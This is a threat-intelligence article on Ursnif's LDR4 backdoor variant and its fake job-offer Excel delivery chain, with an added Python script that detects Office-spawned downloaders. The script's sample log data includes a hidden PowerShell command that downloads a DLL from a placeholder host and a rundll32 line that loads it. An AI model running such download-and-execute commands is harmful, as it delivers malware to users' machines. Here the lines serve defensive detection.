
Ursnif Begins with its Backdoor Era; Enters Malware Distribution Game

Since its emergence in the mid-2000s, the Ursnif malware (aka Gozi or Gozi/ISFB) has powered multiple banking trojan campaigns. More recently, Ursnif has rolled out a new variant with generic backdoor capabilities.

Here are the details

Mandiant researchers first observed this variant in June and named it LDR4. Its code has been cleaned up and simplified, and all banking features have been removed.
  • The LDR4 backdoor's features and modules focus on gaining initial access to the compromised machine.
  • The malware evades detection by arriving as a DLL that is packed with portable-executable crypters and signed with valid certificates.
  • It collects system service data from the Windows registry and, upon execution, generates a user ID and a system ID, which it uses to fetch and execute various commands on the host.
  • A successful initial compromise opens the door to follow-on ransomware and data-theft extortion operations.

Propagation

  • Ursnif operators are distributing the LDR4 variant via fake job offer email lures. These emails contain a link to a website that impersonates a legitimate company.
  • Visitors to the site are asked to solve a CAPTCHA to download an Excel document, which in turn downloads and executes the payload from a remote resource.
  • The operators have also been seen using a lure themed around accounting software to deliver the payload.
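The delivery chain above (an Excel document that fetches and runs a DLL payload from a remote resource) is something endpoint telemetry can catch without any LDR4-specific indicators. The following detection sketch is an added example written for this article; it is not code from Mandiant, Cyware, or the Ursnif operators. The log format (a constructed "parent|image|command_line" line), the process names, and the file paths are all assumptions chosen for illustration, not values taken from the campaign.

```python
"""Flag Office-spawned downloader/loader activity in process-creation logs.

Added example, not from the original article. The event format and every
process name, URL and path below are constructed assumptions.
"""
import re

# Office applications whose child processes deserve scrutiny (assumed list).
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Scripting hosts and loaders that a spreadsheet should rarely launch (assumed list).
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# A .dll referenced under a user-writable directory (assumed set of directories).
USER_WRITABLE_DLL_RE = re.compile(
    r"\\(Temp|AppData|Downloads|Public)\\[^ ,]*\.dll\b", re.IGNORECASE
)

# Constructed sample telemetry: "parent_image|image|command_line". Not real data.
SAMPLE_EVENTS = [
    "explorer.exe|EXCEL.EXE|EXCEL.EXE C:\\Users\\a\\Downloads\\Job_Offer.xlsm",
    "EXCEL.EXE|powershell.exe|powershell -w hidden Invoke-WebRequest "
    "http://example.invalid/p.dll -OutFile C:\\Users\\a\\AppData\\Local\\Temp\\p.dll",
    "EXCEL.EXE|rundll32.exe|rundll32.exe C:\\Users\\a\\AppData\\Local\\Temp\\p.dll,DllMain",
    "explorer.exe|EXCEL.EXE|EXCEL.EXE C:\\Users\\a\\Documents\\budget.xlsx",
    # Benign: the print-spooler helper is a normal Excel child and must not alert.
    "EXCEL.EXE|splwow64.exe|splwow64.exe 12288",
]


def parse_event(line):
    """Split one constructed log line into its three fields (names lower-cased)."""
    parent, image, cmdline = line.split("|", 2)
    return {"parent": parent.strip().lower(),
            "image": image.strip().lower(),
            "cmdline": cmdline}


def classify(event):
    """Return the list of detection reasons that apply to a single event."""
    reasons = []
    if event["parent"] in OFFICE_APPS and event["image"] in SUSPICIOUS_CHILDREN:
        reasons.append("office-child")
    if URL_RE.search(event["cmdline"]):
        reasons.append("remote-url")
    if USER_WRITABLE_DLL_RE.search(event["cmdline"]):
        reasons.append("dll-user-path")
    return reasons


def analyze(lines):
    """Return (index, child image, reasons) for events that look like the chain.

    The Office-parent condition is required, so an ordinary browser download
    (which also carries a URL) is not flagged on its own.
    """
    findings = []
    for idx, line in enumerate(lines):
        ev = parse_event(line)
        reasons = classify(ev)
        if "office-child" in reasons:
            findings.append((idx, ev["image"], reasons))
    return findings


if __name__ == "__main__":
    for idx, image, reasons in analyze(SAMPLE_EVENTS):
        print(f"event {idx}: {image} flagged for {', '.join(reasons)}")
```

Run against the constructed sample, the two Excel-spawned events (the PowerShell download and the DLL load from a user-writable path) are flagged, while opening either spreadsheet and the spooler helper are not. In a real deployment the same three conditions map onto Sysmon Event ID 1 or EDR process-creation fields; the "office-child" test is the high-signal one, and the URL and user-path DLL checks add context for triage.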

Wrapping up

Previous Ursnif variants functioned as high-risk banking trojans and launched several sophisticated, successful campaigns. The latest LDR4 variant, with its mix of code refactoring, regressions, and interesting simplification strategies, points toward a new backdoor era for this malware. With the adoption of backdoor capabilities, it joins the ranks of other malware families that made the same shift, such as Emotet, TrickBot, and Qakbot.
Cyware Publisher
